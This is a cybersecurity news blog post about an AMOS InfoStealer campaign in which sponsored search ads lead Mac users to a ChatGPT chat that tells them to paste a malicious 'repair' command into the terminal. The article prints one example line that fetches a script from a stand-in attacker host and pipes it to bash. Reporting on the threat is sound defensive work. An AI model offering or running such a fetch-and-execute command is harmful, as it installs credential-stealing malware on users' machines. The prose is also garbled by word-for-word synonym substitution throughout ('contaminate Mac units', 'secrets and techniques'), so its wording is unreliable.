Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Threat Actors Leverage ChatGPT to Attack Mac Devices With AMOS InfoStealer

Threat Actors Leverage ChatGPT to Attack Mac Devices With AMOS InfoStealer

Posted on December 11, 2025December 11, 2025 By CWS

A brand new AMOS InfoStealer marketing campaign is abusing belief in ChatGPT to contaminate Mac units underneath the guise of straightforward troubleshooting assist.

Victims seek for a repair to a sound downside, click on a sponsored ChatGPT consequence, and are proven what seems like a traditional chat session.

The chat then returns a “restore” command and tells the consumer to run it within the macOS terminal.

Google Chrome Looking Historical past extract from contaminated Mac gadget (Supply – KROLL)Google Chrome Looking Historical past extract from contaminated Mac gadget (Supply – KROLL)

The assault blends social engineering and technical abuse in a method that feels routine to customers. There isn’t a faux installer window or apparent phishing web page.

As an alternative, the sufferer follows what seems to be a traditional assist stream in a widely known AI chat interface. KROLL safety researchers recognized that this stream was used to deploy AMOS InfoStealer on focused Mac endpoints.

The KROLL crew detected that the lure is pushed utilizing Google Advertisements, which place the malicious ChatGPT session on the high of search outcomes. The area proven is reputable, which makes it even tougher for a standard consumer to identify the danger.

As soon as the consumer trusts the chat, a single copy‑paste operation within the terminal is adequate to compromise the system.

ChatGPT Directions proven to the consumer (Supply – KROLL)

The affect is critical for each house customers and corporations. AMOS InfoStealer is constructed to reap browser information, credentials, session cookies, and different saved secrets and techniques from the contaminated Mac.

Stolen information can then be reused for account takeover, lateral motion, or sale on underground markets.

An infection Mechanism and Malicious Command Execution

KROLL analysts traced the preliminary an infection to a terminal command given by the faux ChatGPT chat, which acts as an indicator of compromise.

The command tells macOS to obtain and run a distant script, a sample that aligns with MITRE ATT&CK strategies for consumer execution and ingress device switch.

A typical malicious sample seems like:-

curl -s https://attacker-example[.]com/installer.sh | bash

When executed, this one‑line command pulls a shell script over HTTPS, saves nothing seen to the consumer, and runs the script in the identical terminal session. The script can then set up AMOS, arrange persistence, and begin information theft.

Comply with us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Actors, AMOS, Attack, ChatGPT, Devices, InfoStealer, Leverage, Mac, Threat

Post navigation

Previous Post: Hackers Infiltrate VS Code Marketplace with 19 Malicious Extensions Posing as PNG File
Next Post: 2 Chinese Hackers Trained Cisco Program Now Attacking Cisco Devices

Related Posts

North Korean Hackers Trick Users With Weaponized Zoom Apps to Execute System-Takeover Commands North Korean Hackers Trick Users With Weaponized Zoom Apps to Execute System-Takeover Commands Cyber Security News
Hackers Weaponizing Telegram Messenger with Dangerous Android Malware to Gain Full System Control Hackers Weaponizing Telegram Messenger with Dangerous Android Malware to Gain Full System Control Cyber Security News
Hackers Hijacking Snap Domains to Posion Linux Software Packages for Desktops and Servers Hackers Hijacking Snap Domains to Posion Linux Software Packages for Desktops and Servers Cyber Security News
Google Requires Crypto App Developers to Have License or Certification From Relevant Authorities Google Requires Crypto App Developers to Have License or Certification From Relevant Authorities Cyber Security News
Infostealers Actively Attacking macOS Users in The Wild to Steal Sensitive Data Infostealers Actively Attacking macOS Users in The Wild to Steal Sensitive Data Cyber Security News
Delta Dental of Virginia Data Breach Exposes 146,000+ Customers Personal Details Delta Dental of Virginia Data Breach Exposes 146,000+ Customers Personal Details Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages
  • DragonForce Ransomware Group’s Expanding Cartel Operations
  • North Korean Hackers Exploit AI for Enhanced Cyber Attacks

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages
  • DragonForce Ransomware Group’s Expanding Cartel Operations
  • North Korean Hackers Exploit AI for Enhanced Cyber Attacks

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News